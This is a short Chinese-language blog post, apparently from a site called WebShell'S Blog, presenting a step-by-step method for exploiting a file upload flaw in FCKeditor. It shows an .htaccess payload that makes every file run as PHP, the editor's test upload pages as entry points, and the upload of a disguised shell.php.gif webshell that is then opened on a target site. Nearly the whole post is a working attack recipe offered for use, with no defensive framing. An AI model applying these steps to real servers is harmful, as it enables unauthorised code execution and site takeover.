FCKeditor编辑器全部版本另类上传漏洞
利用步骤:
1.创建一个htaccess文件:
代码内容:
SetHandler application/x-httpd-php
2.实用编辑器上传htaccess文件.
https://www.webshell.cc/FCKeditor/editor/filemanager/upload/test.html
https://www.webshell.cc/FCKeditor/editor/filemanager/browser/default/connectors/test.html
3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问http://www.badguest.cn/上传目录/shell_php.gif
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/942.html